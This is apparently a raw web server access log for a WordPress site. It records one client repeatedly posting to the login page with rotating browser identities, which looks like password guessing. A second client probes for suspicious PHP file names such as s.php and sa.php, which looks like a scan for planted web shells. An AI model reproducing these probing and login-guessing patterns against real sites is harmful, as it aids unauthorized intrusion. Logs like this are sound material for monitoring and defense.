160.30.137.9 - - [29/Dec/2025:22:37:16 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0"
4.190.186.103 - - [29/Dec/2025:22:37:17 +0300] "GET /phpmailer.lang-sv.php HTTP/1.1" 301 162 "https://duckduckgo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:17 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0"
160.30.137.9 - - [29/Dec/2025:22:37:17 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:118.0) Gecko/20100101 Firefox/118.0"
4.190.186.103 - - [29/Dec/2025:22:37:17 +0300] "GET /phpmailer.lang-sv.php HTTP/1.1" 404 47066 "https://duckduckgo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
160.30.137.9 - - [29/Dec/2025:22:37:17 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
160.30.137.9 - - [29/Dec/2025:22:37:18 +0300] "GET /wp-admin/index.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:18 +0300] "GET /s.php HTTP/1.1" 301 162 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
160.30.137.9 - - [29/Dec/2025:22:37:18 +0300] "GET /wp-admin/index.php HTTP/1.1" 302 5 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:18 +0300] "GET /s.php HTTP/1.1" 404 47066 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
160.30.137.9 - - [29/Dec/2025:22:37:18 +0300] "GET /wp-login.php?redirect_to=https%3A%2F%2F891rpm.com%2Fwp-admin%2Findex.php&reauth=1 HTTP/1.1" 200 3376 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
160.30.137.9 - - [29/Dec/2025:22:37:18 +0300] "POST /wp-login.php HTTP/1.1" 301 162 "http://891rpm.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
4.190.186.103 - - [29/Dec/2025:22:37:18 +0300] "GET /sa.php HTTP/1.1" 301 162 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
